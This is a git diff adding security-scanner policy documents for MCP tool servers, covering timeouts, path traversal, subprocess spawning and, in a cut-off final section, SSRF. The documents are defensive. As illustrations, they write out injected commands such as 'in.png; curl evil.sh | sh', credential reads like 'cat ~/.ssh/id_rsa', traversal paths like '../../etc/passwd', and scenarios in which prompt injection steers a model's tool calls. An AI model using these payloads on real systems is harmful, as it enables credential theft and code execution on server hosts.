+**Rules:** MCP-004 +**Severities:** high +**Fix types:** code +**References:** LLM10 + +--- + +## What this policy covers + +This policy targets outbound HTTP calls made from inside an MCP tool handler — +a function registered with `@server.tool`, `@mcp.tool`, or `.register_tool`. +Detection is the `call_without_kwarg` predicate over the `requests.*` / +`httpx.*` / `urllib.request.urlopen` callee families: `requests.get / post / +put / delete / patch / head / request`, the `requests.Session.get / post` +aliases, `httpx.get / post / put / delete / patch / head / request`, and +`urllib.request.urlopen` (or the bare `urlopen` import). The rule fires when one +of those callees is invoked from a discovered MCP tool body with no `timeout=` +keyword argument — the kwarg absent, or present with a literal `None`, both +count. The MCP runtime never injects a timeout itself, so a missing timeout is +directly observable in source. + +--- + +## Why network timeouts are a distinct concern in agent tools + +An MCP tool does not run inside a request the developer can cancel. It runs +inside an MCP server that is invoked by an **external orchestrator** — a Claude +Desktop client, an IDE agent, another team's agent loop — with inputs the model +produces from conversation context, frequently with **no human in the loop** on +the individual tool call. The author of the tool and the operator of the +orchestrator are usually different people, so the tool body is the only place +the failure can be bounded, and it has been left unbounded. + +When a handler calls `requests.get(url)` with no timeout, the call blocks on a +stalled socket until the kernel gives up. `requests` and `httpx` default to no +timeout, and `urllib`'s `urlopen` defaults to `socket._GLOBAL_DEFAULT_TIMEOUT`, +which is `None` unless someone called `socket.setdefaulttimeout()` at process +start — almost nobody does. The practical default on Linux is the system +`tcp_syn_retries` timeout: multiple minutes of dead air. For that entire window +the tool invocation produces nothing, and the connecting client's +request-response exchange with the server cannot complete. + +The blast radius is larger than one stalled fetch, and that is the +MCP-specific angle. An orchestrator that does not hear back from a tool call +commonly **retries** it, or **fans out** several tool calls concurrently as the +model explores — so one slow upstream dependency does not stall one invocation, +it stalls several. Worse, an MCP server is frequently **shared across multiple +connected clients**: a single hung upstream dependency can occupy the worker(s) +serving every connected agent, so the failure of one third-party endpoint +degrades availability for every consumer of the server, not just the agent that +triggered it. This is the unbounded-consumption shape — OWASP LLM Top 10:2025 +**LLM10 (Unbounded Consumption)**: a model-driven, retry-prone caller plus a +server with no per-call wall clock turns one slow host into a resource-exhaustion +condition no orchestrator-side timeout was guaranteed to catch. + +--- + +## Rule-by-rule defense + +### MCP-004 — Network call has no timeout (Severity: high, Confidence: 0.85, Fix type: code) + +**What we detect:** +An MCP tool handler (`@server.tool` / `@mcp.tool` / `.register_tool`) whose body +invokes `requests.get / post / put / delete / patch / head / request`, a +`requests.Session.get / post` alias, `httpx.get / post / put / delete / patch / +head / request`, or `urllib.request.urlopen` / the bare `urlopen` — with no +`timeout=` keyword argument on that call. A `timeout=` present but set to a +literal `None` counts as missing. + +**Why it is flaggable:** +Every client in the callee set defaults to no timeout. Without one, a stalled +socket pins the handler until the kernel times the connection out, and because +the MCP runtime imposes no wall clock on tool code, the server's reply to the +connecting client is blocked for the full OS TCP timeout — minutes, not seconds. +The pattern is therefore a direct, mechanical indicator that one slow upstream +host can stall the tool invocation indefinitely. + +**Real-world consequence:** +- A `fetch_page(url)` MCP tool that calls `requests.get(url)` on a model-supplied + URL hangs the invocation when the URL points at a slow or non-responsive host. + The connecting agent sees no result and commonly retries, multiplying the held + workers. +- Because the server is shared, a second agent connected to the same MCP server + for an unrelated tool finds its calls queued behind the workers stuck on the + first agent's dead host — one external dependency outage becomes a server-wide + stall (LLM10, unbounded consumption). + +**Why severity is high and not medium:** +The failure mode is denial of the tool invocation — and, on a shared server, of +the server itself — not a slow or lower-quality response. There is no partial, +in-band mitigation: without an explicit `timeout=`, the kernel default applies, +and the kernel default is "minutes." Medium is reserved for issues that degrade +output quality; this one removes availability for every client of the server, so +it is scored high. + +**Fix type — code:** +The fix is a source-level `timeout=` kwarg on the call. No guardrail, hook, or +sandbox parameter can inject a timeout into an already-running socket wait, and +the MCP runtime does not expose a per-tool wall clock to configure externally, so +the tool body is the only place the bound can be applied. + +**Confidence 0.85:** +The gap is a small set of false-positive and false-negative cases. False +positive: a `requests.Session` (or `httpx.Client`) configured with a default +timeout on the *session/client object* — via a mounted adapter or the client +constructor — and then used through a `.get(...)` call site that carries no +kwarg; the predicate sees a bare call and fires even though the session enforces +a bound. False negative: a request made through a cross-module helper (the tool +calls `do_fetch(url)`, which performs the timeout-less request in another file) +— the predicate inspects the tool body directly and does not follow calls into +other modules — and a timeout passed positionally (`urlopen(req, None, 10)`), +which `call_without_kwarg` does not see. These are uncommon enough relative to +the bare call-site form to keep the rule above 0.8 rather than dropping it +toward the SSRF rules' lower band. + +--- + +## What this policy does not cover + +- **Other HTTP clients.** `aiohttp` (notably — async MCP handlers commonly use it + and it is **not** in the callee set), `urllib3` used directly, raw + `socket.create_connection`, `pycurl`, gRPC stubs, and custom transports all + make outbound calls the predicate never inspects. +- **Session/client-level timeouts.** A timeout configured on a + `requests.Session`, an `httpx.Client(timeout=...)`, or a mounted adapter is a + real bound, but the call site that uses it carries no `timeout=` kwarg, so the + rule fires anyway (false positive) — and conversely a developer who reads this + finding may "fix" only the flagged call while a sibling call through the same + unbounded client stays exposed. +- **Library or process defaults.** A process that calls + `socket.setdefaulttimeout(30)` at startup does bound `urlopen`, but the rule + cannot see that global and still flags the bare call; treat the call-site + `timeout=` as the contract regardless. +- **Unreasonable-but-present timeouts.** A `timeout=3600` is functionally no + bound for an interactive agent, but the rule treats any `timeout=` kwarg as a + pass and will not flag it. +- **Transitive calls.** When the tool body calls a helper that performs the + request without a timeout, the body-only walk does not follow into the helper + and the rule stays silent. +- **Retry-without-backoff storms.** A handler that times out cleanly but retries + in a tight loop is still an unbounded-consumption hazard; that is idempotency / + retry territory, not this timeout policy. + +--- + +## Recommendations beyond the fix + +```python +import httpx +from mcp.server.fastmcp import FastMCP + +mcp = FastMCP("fetch-server") + +# One shared client with a default timeout, so every tool inherits the bound +# even if a future call site forgets the per-call kwarg. +_client = httpx.Client(timeout=httpx.Timeout(15.0, connect=5.0)) + +@mcp.tool() +def fetch_page(url: str) -> dict: + """Fetch a URL and return its text content (capped).""" + try: + resp = _client.get(url, timeout=15.0) # explicit per-call bound, belt and braces + resp.raise_for_status() + except httpx.TimeoutException: + # Return a structured tool error rather than letting the handler block + # or raising an opaque traceback the orchestrator cannot branch on. + return {"error": "upstream timed out", "url": url, "retryable": False} + except httpx.HTTPError as exc: + return {"error": str(exc), "url": url, "retryable": False} + body = resp.text[:500_000] # cap the read so a slow-drip server cannot exhaust memory + return {"content": body or "[empty response]"} +``` + +1. **Set the timeout on a shared client, not only at the call site.** A + module-level `httpx.Client(timeout=...)` / `requests.Session` gives every + handler a default bound, so a new tool that forgets the per-call kwarg still + inherits one — closing the false-negative the rule cannot see. +2. **Return timeouts as structured tool errors.** Catch the timeout and return a + JSON-serializable error the orchestrator can branch on, rather than letting + the handler block or surfacing a raw traceback — an unhandled hang reads to + the model as silence and invites a retry. +3. **Bound the connect phase separately.** Use `httpx.Timeout(read, connect=...)` + (or `requests` `(connect, read)` tuple) so a host that never completes the TCP + handshake fails fast, independent of the read budget. +4. **Cap the response read.** `resp.text[:N]` / `resp.read(N)` prevents a + slow-drip or oversized response from exhausting the worker's memory even when + the connection itself is timely — a second unbounded-consumption vector the + timeout alone does not close. +5. **Validate the destination before calling.** Confirm the scheme is `http(s)` + and the host is on an allow-list before issuing the request; on a shared MCP + server, a model-supplied URL is an SSRF vector into whatever internal network + the server's egress can reach. +6. **Keep timeouts tight enough to free workers under load.** On a server shared + across clients, a generous timeout still holds a worker for that whole window; + size the bound to the endpoint's real latency budget so a dead dependency + releases the worker quickly. diff --git a/docs/Policy/mcp/path_safety.md b/docs/Policy/mcp/path_safety.md new file mode 100644 index 0000000..92f96e2 --- /dev/null +++ b/docs/Policy/mcp/path_safety.md @@ -0,0 +1,226 @@ +--- +policy_id: mcp_path_safety +category: mcp +topic: path_safety +rules: + - id: MCP-005 + severity: high + confidence: 0.7 + scope: tool + fix_type: code +references: [LLM02, LLM06] +--- + +# Policy Rationale: Path Safety + +**Policy ID:** `mcp_path_safety` +**File:** `mcp/path_safety.yaml` +**Rules:** MCP-005 +**Severities:** high +**Fix types:** code +**References:** LLM02, LLM06 + +--- + +## What this policy covers + +MCP tool handlers that take a path-like parameter and pass it into a filesystem +call without normalizing it first. The predicate +`call_uses_unnormalized_path_param` tracks, per parameter, whether a path-shaped +argument (`path`, `file`, `*_path`, `*_dir`, …) flows into an I/O callee — `open` +or `Path`, or anything under the `shutil.` / `os.` namespaces — **without** having +been run through `.resolve()` / `os.path.realpath()` in the same handler. It is +per-parameter: a handler that resolves one path but not another still fires on the +unresolved one. The rule is scoped to `mcp_tool` — it fires on functions +registered as MCP tools (`@server.tool` / `@mcp.tool` / `.register_tool`), not on +arbitrary file-touching code. + +--- + +## Why path safety is a distinct concern in agent tools + +An MCP tool handler runs on the far side of a trust boundary that is wider than an +in-process SDK tool's. Its arguments are **fully model-controlled inputs**: they +arrive over the protocol from a connecting client, are chosen by a model from +conversation context, and reach the handler with **no human in the loop** to vet +them. A handler `read_file(path: str)` that opens `path` directly therefore trusts +the calling orchestrator — and, transitively, anything that can influence that +model, including content prompt-injected upstream — to choose which file on disk +the server reads or writes. There is no fixed, developer-authored path with only a +basename substituted; the *entire* path string is attacker-influenceable. A +payload like `../../etc/passwd`, an absolute `/home/user/.ssh/id_rsa`, or a symlink +pointing outside the intended directory all resolve to real targets. + +This is worse on the server side than the same gap inside an in-process SDK tool +for two compounding reasons. First, the MCP server is a long-lived process that +commonly runs with **broad filesystem access shared across clients** — one +poisoned request can read or clobber files that belong to a different session, +project, or tenant connected to the same server. Second, the result crosses the +boundary back: a read handler is an arbitrary-file **exfiltration** primitive (the +file's bytes flow back into the model context, then into transcripts, logs, or the +next tool call), while a write handler is an arbitrary-file **overwrite** primitive +(the model can drop content at any path the server process can reach, including the +server's own config or a `.claude/settings.json` that widens its later +permissions). + +Normalization alone is necessary but not sufficient: `.resolve()` collapses the +`../` and dereferences symlinks, but the resolved path must *also* be confirmed to +live inside an intended root before any I/O touches it. The rule flags the +missing-normalization precondition because that is the structurally detectable +half; the containment check is the author's responsibility (see recommendations). + +The cluster anchors to OWASP LLM02 (Sensitive Information Disclosure — reading +arbitrary files such as credentials and secrets) and LLM06 (Excessive Agency — the +tool reaches filesystem state far beyond its intended scope). + +--- + +## Rule-by-rule defense + +### MCP-005 — Path parameter used in I/O without validation (Severity: high, Confidence: 0.7, Fix type: code) + +**What we detect:** +A path-shaped parameter of an MCP tool handler that flows into a filesystem call — +`open`, `Path`, or any `shutil.*` / `os.*` callee — in the handler body **without** +a `.resolve()` / `realpath()` having been applied to that parameter earlier in the +same function. The match is `call_uses_unnormalized_path_param` with +`callees: [open, Path]` and `callee_prefixes: [shutil., os.]`, evaluated +per-parameter, so a handler that normalizes one path argument but passes a second +straight through still fires on the unresolved one. + +**Why it is flaggable:** +An unnormalized, model-supplied path can traverse out of the intended directory +(`../../`), name an absolute path anywhere on the volume, or follow a symlink to an +arbitrary target. Because the handler never collapses or contains the path before +the I/O call, whatever the model passes is what the server process opens — the gap +between "a path the author intended" and "any path the model can express" is +exactly the un-normalized argument. + +**Real-world consequence:** +An MCP `read_file(path)` tool doing `open(path)` is asked by a (possibly +prompt-injected) client to open `../../etc/passwd`, `../../../.env`, or +`~/.aws/credentials`; the file's contents return across the protocol into the model +context and leak into transcripts and logs. The write direction is symmetric: a +`save_report(path, body)` handler doing `Path(path).write_text(body)` is steered +into `save_report("../../.bashrc", payload)` or into overwriting a shared config +file — on a server with filesystem access spanning multiple clients, that write can +land in another session's workspace. + +**Why severity is high and not medium:** +The outcome is arbitrary-file read or overwrite reachable directly from +model-controlled input with no human in the loop — credential theft or file +corruption, the LLM02/LLM06 core. It is not bumped to critical because exploitation +is still conditioned on what the handler does with the open handle and on the +server process's own filesystem permissions (a server confined to a per-session +chroot or running as an unprivileged user bounds the blast radius even when the +handler is buggy). It is not lowered to medium because, unlike a coarse +"writes-the-filesystem" signal, this predicate confirms an *unnormalized path +parameter actually flows into the I/O call* — the detected pattern is the +vulnerability, not merely a lead. + +**Fix type — code:** +The fix — resolve the path and assert it sits under an allowed root before any I/O +— is an edit to the tool handler's own source. It cannot be applied purely through +a guardrail, hook, or sandbox policy without changing the handler, so it is `code`, +not `config`. (A server-level sandbox bounds the damage but does not satisfy the +rule, because the handler still passes an unnormalized path into I/O.) + +**Confidence 0.7:** +Moderate by design, and below 0.80 for two specific reasons. *False positive:* the +detection is a parameter-name heuristic over a same-function body walk. It fires on +any parameter whose name looks path-like, so a `path` that is not a filesystem path +at all — a URL path component, a dotted attribute path, a JSON pointer — flagged +because it reaches a callee like `os.path.join` is a false positive. The body-only +walk is also local: a handler that hands its path argument to a shared +`validate_under_root()` helper in **another module** and only then opens the +returned value has no `.resolve()` visible in its own body, so it fires even though +it is safe (the cross-module-validation false negative-for-the-author / +false-positive-for-the-rule case). *False negative:* the rule confirms only that +*no recognized normalization call* is present — a handler that calls `.resolve()` +to clear the predicate but never checks containment against a root passes the rule +yet remains fully exploitable. The 0.7 encodes "very likely a real traversal +primitive — confirm the parameter is genuinely a caller-supplied filesystem path, +and that no out-of-module guard sits in front of it, before acting." + +--- + +## What this policy does not cover + +Written adversarially — these are the patterns a developer could point to in +arguing a finding is a false positive, and the equivalent risks that escape the +predicate entirely: + +- **Containment.** A handler that calls `.resolve()` but never confirms the result + is inside an allowed root satisfies the rule and remains exploitable — the most + common way to clear the rule yet stay vulnerable. The rule detects + missing-normalization, not missing-containment. +- **Out-of-module normalization.** Validation performed in a helper in another + module (or a shared `pathutil` package) is invisible to the body-only walk, so a + safe handler that delegates its check fires anyway — a false positive. +- **Path-like values that miss the name heuristic** — a parameter called `target`, + `name`, `dest`, or `loc` that is in fact a filesystem path will *not* fire, so a + genuine traversal primitive behind an off-vocabulary parameter name is a false + negative. +- **Non-path parameters that match the name heuristic** — a `path` that is a URL + route, an XPath/JSON-pointer, or an object attribute path is flagged when it + reaches an `os.*` / `shutil.*` callee even though no filesystem traversal is + possible. +- **I/O through unrecognized sinks.** The callee set is `open` / `Path` / + `shutil.*` / `os.*`. A path that flows into `io.open`, `aiofiles.open`, + `codecs.open`, `pathlib.Path(...).open()` reached through an alias, a + `tempfile`-rooted join, a third-party storage client, or `subprocess`/shell file + redirection is outside the matched set and does not fire. +- **Symlink races (TOCTOU).** Even a handler that resolves and containment-checks + correctly can be defeated by a symlink swapped between the check and the `open()`; + the rule does not model time-of-check/time-of-use windows. +- **Server-level confinement is not assessed.** Whether the MCP server runs in a + chroot, a container, or as an unprivileged user — the controls that actually bound + the blast radius across clients — is invisible to a tool-scope rule; it neither + raises nor lowers the finding. + +--- + +## Recommendations beyond the fix + +```python +from pathlib import Path +from mcp.server.fastmcp import FastMCP + +mcp = FastMCP("files") + +# One fixed root per server (ideally per-session/per-client when the server is +# multi-tenant), resolved once at import. +_ROOT = Path("/srv/mcp/workspace").resolve() + + +@mcp.tool() +def read_file(path: str) -> dict: + """Read a UTF-8 text file from inside the server workspace.""" + candidate = (_ROOT / path).resolve() # join under the root, then collapse ../ and symlinks + if not candidate.is_relative_to(_ROOT): # containment, not just normalization + return {"error": "path escapes the workspace", "retryable": False} + if candidate.is_symlink(): # belt-and-suspenders before the final open + return {"error": "symlinks are not allowed", "retryable": False} + return {"content": candidate.read_text(encoding="utf-8", errors="replace")[:500_000]} +``` + +1. **Always pair `.resolve()` with `is_relative_to(root)`.** Normalization without + a containment check is the single most common way to satisfy the rule yet stay + vulnerable — the resolved path must be *proven* to live under the root. +2. **Join under a fixed root (`_ROOT / path`) instead of trusting an absolute + path** the model supplies; an absolute `/etc/passwd` joined under a root and then + resolved still escapes unless containment is checked, so do both. +3. **Use `is_relative_to()`, not a string `startswith(_ROOT)` prefix match** — the + string form is defeated by a sibling directory whose name shares the prefix + (`/srv/mcp/workspace-evil`). +4. **Scope the root per session/client on a multi-tenant server**, not one shared + workspace, so a traversal in one connection cannot reach another client's files + even within the allowed root. +5. **Reject symlinks explicitly and cap the bytes read** so a symlink to a device + file or an enormous file cannot exhaust the server's memory. +6. **Run the MCP server unprivileged and confined** (container, chroot, or a + dedicated low-permission user) so even a handler bug is bounded by the OS — this + does not satisfy the rule, but it shrinks the worst case. +7. **Log every resolved read/write path with the client/session identifier** for + audit, since the model — not a human — chose the path and there is no interactive + confirmation step to capture. diff --git a/docs/Policy/mcp/shell_safety.md b/docs/Policy/mcp/shell_safety.md new file mode 100644 index 0000000..29bce51 --- /dev/null +++ b/docs/Policy/mcp/shell_safety.md @@ -0,0 +1,319 @@ +--- +policy_id: mcp_shell_safety +category: mcp +topic: shell_safety +rules: + - id: MCP-010 + severity: high + confidence: 0.7 + scope: tool + fix_type: code + - id: MCP-012 + severity: high + confidence: 0.7 + scope: tool + fix_type: code +references: [LLM06, LLM05] +--- + +# Policy Rationale: Shell Safety + +**Policy ID:** `mcp_shell_safety` +**File:** `mcp/shell_safety.yaml` +**Rules:** MCP-010, MCP-012 +**Severities:** high, high +**Fix types:** code, code +**References:** LLM06, LLM05 + +--- + +## What this policy covers + +MCP tool handlers — functions registered with `@server.tool`, `@mcp.tool`, or +`.register_tool` — whose body spawns an OS process. Two rules cover the two +authoring languages, both keyed on the same structured `has_shell_call` +predicate (an AST callee walk, not a substring scan, so the call name appearing +in a comment, docstring, or string literal does not fire). **MCP-010** (Python) +fires when the handler calls `os.system`, `os.popen`, any `subprocess.*` member +(`subprocess.run`, `.Popen`, `.call`, `.check_output`, `.check_call`, …), or any +`os.spawn*` member. **MCP-012** (TypeScript) fires when the handler invokes a +`child_process` API — `exec`, `execSync`, `spawn` (and the related +`execFile`/`execFileSync`/`spawnSync`/`fork`) — called bare from a destructured +`const { exec } = ...` or via a `child_process.*` namespace. Both rules fire on +**any** subprocess spawn from the tool body; neither is gated on `shell=True` / +`shell: true` — the presence of process spawn on a model-callable surface is the +signal, and the shell flag only widens an already-broad primitive. + +--- + +## Why shell invocation is a distinct concern in agent tools + +A tool body that spawns a subprocess is a command-execution surface driven by +**fully model-controlled inputs across the MCP boundary**. In a conventional +program a subprocess callsite is fixed: the developer wrote the command, and the +only variability is parameter substitution they explicitly approved. An MCP tool +inverts this. The arguments arrive as a JSON payload from a connecting client's +model, and the MCP protocol places **no human in the loop** between the model +deciding to call the tool and the server running it. The tool author may intend +"the model only supplies one argument," but the protocol enforces nothing: a +prompt-injected conversation returns whatever strings it wants, and the handler +faithfully spawns whatever it builds. If any argument reaches the command — +especially via `shell=True` / `shell: true` or string concatenation into a +command line — that is textbook command injection. Even with no injection at +all, an unsandboxed subprocess hands the calling model arbitrary local +capability: the spawned process inherits the server host's filesystem, +environment (including API keys and database credentials), and outbound network +access. + +The MCP boundary sharpens this in two ways a single-process agent does not face. +First, an MCP server is **long-lived infrastructure that may be shared across +clients and sessions** — it is not a script the author runs once under their own +eyes. A spawn primitive exposed here is reachable by every model on every +connection for the life of the process, and the blast radius is the server +host's identity, not the caller's. Second, the MCP runtime provides **no +sandbox** around tool execution; the subprocess gets exactly what the server +process has. A model-driven `subprocess.run("env", shell=True)` exfiltrates the +server's secrets in one call; a `subprocess.run("cat ~/.ssh/id_rsa", shell=True)` +leaks a private key straight into the model context, and from there into provider +logs, the next turn, or a third party. + +Manual deny-list filtering (regex against `rm -rf`, `curl`, `wget`) is not a +defense at this boundary. The space of dangerous commands is unbounded, encodings +(base64, hex, unicode) walk around naïve patterns, and every new binary on the +server's PATH introduces a new attack class. This is why OWASP LLM Top 10:2025 +puts **Excessive Agency (LLM06)** at the center of agent security and pairs it +here with **Improper Output Handling (LLM05)**: the moment a model-callable tool +can spawn a process, it can effectively do anything the server's account can do, +and a model-supplied string flowing unfiltered into a shell is the worst case of +trusting model output as a command. The right answer is almost always to remove +process spawn from the tool surface, not to filter it. + +--- + +## Rule-by-rule defense + +### MCP-010 — Tool body spawns a subprocess (Severity: high, Confidence: 0.7, Fix type: code) + +**What we detect:** +A Python MCP tool handler (`@server.tool` / `@mcp.tool` / `.register_tool`) +whose body calls `os.system`, `os.popen`, any `subprocess.*` function (e.g. +`subprocess.run`, `subprocess.Popen`, `subprocess.call`, `subprocess.check_output`, +`subprocess.check_call`), or any `os.spawn*` function. The match is the structured +`has_shell_call` predicate — an AST call-node walk that resolves the callee, not a +substring scan — so a `subprocess.run(` appearing in a comment, docstring, or +string literal does not trigger it. The rule fires on **any** such spawn; it does +not require `shell=True`. + +**Why it is flaggable:** +Process spawn from inside a model-callable MCP tool puts the OS shell on the +model's tool surface, reachable by any connecting client with no approval prompt +in the protocol. Because the model chooses the JSON arguments, a prompt-injected +conversation can steer those values into the command. Every safeguard (sandbox, +deny-list, working-directory pin) is bolted on top of an inherently broad +primitive; the rule fires unconditionally because the *presence* of process spawn +is the signal, independent of whether the author wrapped it in filtering. + +**Real-world consequence:** +- A `run_command(command: str)` tool forwarding the model-supplied string into + `subprocess.run(command, shell=True)` is one injected instruction away from + `cat ~/.ssh/id_rsa` or `env` — secrets stream back into the model context and + out to whoever controls the conversation. +- A `convert_file(path: str)` tool that shells out to a CLI converter with the + path concatenated into the command is driven into `report.pdf; curl evil.sh | sh` + via argument injection — no `shell=True` needed if a shell is invoked + downstream, and arbitrary code runs on the server host. + +**Why severity is high and not medium:** +The fix usually requires removing process spawn from the tool altogether or +rearchitecting it behind a typed API. Partial mitigations (argv lists, +`shell=False`, working-directory pinning) reduce specific injection classes but do +not eliminate the underlying excessive-agency problem — a model that can spawn a +process can do whatever the server account can. Severity is not bumped above +`high` because the highest tier is reserved for unconditional remote-code-execution +exposures; here the realized exposure still depends on what the handler does with +the spawn and what the host grants it. + +**Fix type — code:** +Replacing `subprocess.run(...)` with a typed library call, or fronting it with an +argv list and a command allow-list, is an edit to the tool's own source. A sandbox +at the server/deployment level (seccomp, container, dropped credentials) is +complementary but is not what the rule asks for. + +**Confidence 0.7:** +Lower than the OpenAI sibling's 0.9 because MCP tool authors more often wrap a +single fixed command legitimately, and the rule deliberately detects that the tool +*shells out* — not that it does so unsafely. False positives: a handler that +builds a hardcoded argv with no model-derived input +(`subprocess.run(["systemctl", "status", "nginx"])`) still fires even though +nothing flows from the caller; and the `subprocess.*` prefix over-matches the +non-spawning helper `subprocess.list2cmdline(...)`. Whether a genuine spawn is +*safe* in context is a human judgment the rule does not make. False negatives: a +spawn via `multiprocessing.Process`, `asyncio.create_subprocess_exec` / +`create_subprocess_shell`, `pty.spawn` / `pexpect`, or the `os.exec*` family is +not in the callee set, and a spawn wrapped behind a helper (`_run(...)`) defined in +another module escapes the body-only walk. The 0.7 reflects this "shells out at +all" framing. + +### MCP-012 — TypeScript MCP tool spawns a subprocess (Severity: high, Confidence: 0.7, Fix type: code) + +**What we detect:** +A TypeScript MCP tool handler whose body invokes a `child_process` API — `exec`, +`execSync`, `execFile`, `execFileSync`, `spawn`, `spawnSync`, or `fork` — whether +called bare (from a destructured `const { exec } = require("child_process")` / +`import { exec }`) or via a `child_process.*` namespace. Detection is the same +structured `has_shell_call` predicate: during discovery the handler AST is walked +and a `shells_out` fact is stamped when one of those callees appears, which the +predicate reads. This is a resolved-callee match, **not** a substring scan, so the +name appearing in a comment, an unrelated identifier, or a string literal does not +fire. The rule fires on **any** such spawn; it does not require `shell: true`. + +**Why it is flaggable:** +A `child_process` API in a model-callable MCP tool puts OS process spawn on the +model's surface, reachable across the MCP boundary by any connecting client with +no human approval in the protocol. Because the model chooses the arguments it +passes to the tool, a prompt-injected conversation can steer those values into an +OS command — turning the server into an arbitrary-command primitive on its host. +The mechanism is the same excessive-agency core as the Python sibling +[MCP-010](#mcp-010--tool-body-spawns-a-subprocess-severity-high-confidence-07-fix-type-code); +the only delta is the API surface (`child_process` `exec`/`execSync`/`spawn` vs +Python `subprocess.*` / `os.system`). + +**Real-world consequence:** +- A `runCommand(cmd: string)` tool forwarding `cmd` into `execSync(cmd)` (which + runs through `/bin/sh`) is one injected instruction away from `cat ~/.ssh/id_rsa` + or exfiltrating `process.env` — the server's secrets stream back into the model + context. +- A `convertFile(path: string)` tool calling `exec("convert " + path + " out.png")` + is driven into `in.png; curl evil.sh | sh` via the model-supplied path — + concatenation into a shell string means arbitrary code runs on the server host + with the server's credentials. + +**Why severity is high and not medium:** +The fix usually means removing process spawn or rearchitecting behind a typed API; +partial mitigations (argv arrays, dropping `shell: true`) narrow specific injection +classes but not the excessive-agency core. Matches the Python sibling's `high` and +is not bumped above it for the same reason — the realized exposure depends on what +the handler does with the spawn and what the host grants. + +**Fix type — code:** +Replacing the `child_process` call with a library API, or fronting it with an argv +array (`execFile`/`spawn` with an explicit args list, never a shell string) and an +allow-list, is an edit to the tool's own source. A deployment-level sandbox is +complementary. + +**Confidence 0.7:** +Matches the Python sibling's 0.7 and shares its mechanism (a structured callee +match). False positives: a handler that spawns a single fixed command with a +hardcoded argv and no model input (`execFile("git", ["status"])`) still fires — +the rule detects that the tool *shells out*, not that it does so unsafely. False +negatives: a spawn reached through a renamed destructured alias +(`const { exec: run } = ...; run(...)`) whose callee text matches none of the +recognized names, one hidden in a helper in another module, or a spawn via a path +outside the recognized set — `Bun.spawn`, `Deno.Command`, `node:worker_threads`, +or a native addon — is not seen. The 0.7 reflects this "shells out at all" framing +rather than any substring imprecision. + +--- + +## What this policy does not cover + +Write this as an adversary would. The following structurally similar patterns +escape detection: + +- **Python alternative spawn primitives** — `asyncio.create_subprocess_exec` / + `asyncio.create_subprocess_shell`, `pty.spawn`, `pexpect.spawn`, + `multiprocessing.Process`, and the `os.exec*` family (which replaces the current + process). None are in the MCP-010 callee set. +- **TypeScript alternative spawn primitives** — `Bun.spawn`, `Deno.Command`, + `node:worker_threads`, or a native addon that shells out. None are in the + MCP-012 callee set. +- **Renamed or indirected callees** — a destructured alias + (`const { exec: run } = ...; run(...)`) or a spawn wrapped behind a helper + (`_run_safely(...)` in Python, a utility function in another file). Both rules + scan the tool body only, so a spawn one call-frame away in another module is + invisible. +- **Whether a given literal command is safe.** A handler that runs a fully + hardcoded argv with no model input fires the rule even though it is comparatively + benign — the signal is "this tool shells out at all," not "this tool shells out + unsafely." This is the dominant false-positive class and the reason confidence is + 0.7, not higher. +- **The shell flag itself is not what gates the rule.** A tool that passes an argv + list with `shell=False` / no `shell: true` still fires; conversely, satisfying + the rule by dropping the shell flag narrows injection but does not remove the + process-spawn capability the model can still reach. +- **Non-subprocess exfiltration.** Filesystem writes outside a workspace, + env-var leakage, and HTTP/socket exfiltration that does not go through a + subprocess belong to other policies — the MCP HTTP/SSRF surface is covered by + [network.md](network.md). + +--- + +## Recommendations beyond the fix + +```python +# Replace a model-driven `subprocess.run(command, shell=True)` tool with a typed +# API. If a subprocess is genuinely required, build the argv explicitly, pin the +# binary, validate inputs against an allow-list, set a timeout, and drop ambient +# secrets from the child environment. +import shutil +from pathlib import Path + +from mcp.server.fastmcp import FastMCP + +server = FastMCP("files") + +WORKSPACE = Path("/srv/agent/workspace").resolve() +ALLOWED_FORMATS = {"png", "jpg", "webp"} + + +@server.tool() +def convert_image(filename: str, to_format: str) -> dict: + """Convert an image already inside the workspace to another format. + `filename` must resolve inside the workspace; `to_format` must be allowed.""" + if to_format not in ALLOWED_FORMATS: + return {"error": "unsupported format", "retryable": False} + + src = (WORKSPACE / filename).resolve() + if not src.is_relative_to(WORKSPACE) or not src.is_file(): + return {"error": "path escapes workspace", "retryable": False} + + dst = src.with_suffix(f".{to_format}") + convert = shutil.which("convert") # pinned absolute path, not a PATH lookup + if convert is None: + return {"error": "converter unavailable", "retryable": False} + + import subprocess + subprocess.run( + [convert, str(src), str(dst)], # argv list — no shell, no concatenation + shell=False, + timeout=30, # a model can request an endless command + env={"PATH": "/usr/bin"}, # drop inherited secrets and credentials + check=True, + ) + return {"output": str(dst)} +``` + +1. **Prefer a typed library API over shelling out at all.** Most "run a CLI" tools + have a native equivalent (an image library, a Git library, an HTTP client); the + safest subprocess is the one you removed. +2. **If a subprocess is unavoidable, build the argv list explicitly and pass + `shell=False` / never `shell: true`.** Never interpolate or concatenate + model-supplied strings into a command line. In TypeScript prefer + `execFile`/`spawn` with an args array over `exec`/`execSync`. +3. **Pin the binary to an absolute path** (via `shutil.which` at startup, not a + runtime PATH lookup) so a planted binary earlier on PATH cannot hijack the call. +4. **Validate every model-supplied argument against a strict allow-list** before it + reaches the spawn — enumerated choices, not deny-list regex. +5. **Always set a timeout.** An MCP server is long-lived; a model can otherwise pin + a CPU or hold a file handle indefinitely across sessions. +6. **Drop sensitive env vars from the child.** Pass an explicit minimal `env=` / + options `env`; the default inherits the whole server environment, including API + keys and database credentials. +7. **Run the MCP server under an OS sandbox with no ambient credentials** — a + container with a read-only root filesystem, dropped capabilities, a non-root + user, and a network-egress allow-list. Because the server is shared + infrastructure, treat any in-handler filtering as belt-and-braces, not the + primary boundary. +8. **Log every spawned command with the connection / session identity and the + arguments the model supplied**, so an incident on a shared server can be + attributed and reconstructed. diff --git a/docs/Policy/mcp/ssrf.md b/docs/Policy/mcp/ssrf.md new file mode 100644 index 0000000..5217fc1 --- /dev/null +++ b/docs/Policy/mcp/ssrf.md @@ -0,0 +1,309 @@ +--- +policy_id: mcp_ssrf +category: mcp +topic: ssrf +rules: + - id: MCP-008 + severity: high + confidence: 0.6 + scope: tool + fix_type: code + - id: MCP-013 + severity: high + confidence: 0.6 + scope: tool + fix_type: code +references: [LLM06, LLM02] +--- + +# Policy Rationale: Server-Side Request Forgery + +**Policy ID:** `mcp_ssrf` +**File:** `mcp/ssrf.yaml` +**Rules:** MCP-008, MCP-013 +**Severities:** high, high +**Fix types:** code, code +**References:** LLM06, LLM02 + +> **Read [claude_sdk/ssrf.md](../claude_sdk/ssrf.md) for the canonical SSRF threat model.** +> This document covers the MCP-specific differences only — chiefly *who* controls +> the URL argument (a remote orchestrator's model, never a human) and *where* the +> MCP 